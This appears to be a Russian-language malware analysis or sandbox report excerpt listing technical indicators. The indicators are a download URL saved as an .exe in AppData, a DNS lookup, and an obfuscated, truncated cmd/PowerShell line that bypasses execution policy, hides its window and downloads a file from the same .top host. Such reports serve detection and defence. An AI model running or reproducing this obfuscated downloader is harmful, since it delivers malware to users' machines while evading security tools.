Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwE^R^S^HEll^.ex^e ^-^ex^ECUti^ONPOL^ICY^ b^YPa^s^S -^noPROf^iL^e -w^INDowsty^LE hIdDeN (Ne^W-oBJ^eC^T sYSTe^M^.NeT^.w^EbCLiEN^T^).d^O^w^Nloa^dFilE(^'http://www.fopeioaas.top/rea...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "p^OwE^R^S^HEll^.ex^e ^-^ex^ECUti^ONPOL^ICY^ b^YPa^s^S -^noPROf^iL^e -w^INDowsty^LE hIdDeN (Ne^W-oBJ^eC^T sYSTe^M^.NeT^.w^EbCLiEN^T^).d^O^w^Nloa^dFilE(^'http://www.fopeioaas.top/rea...' (со скрытым окном)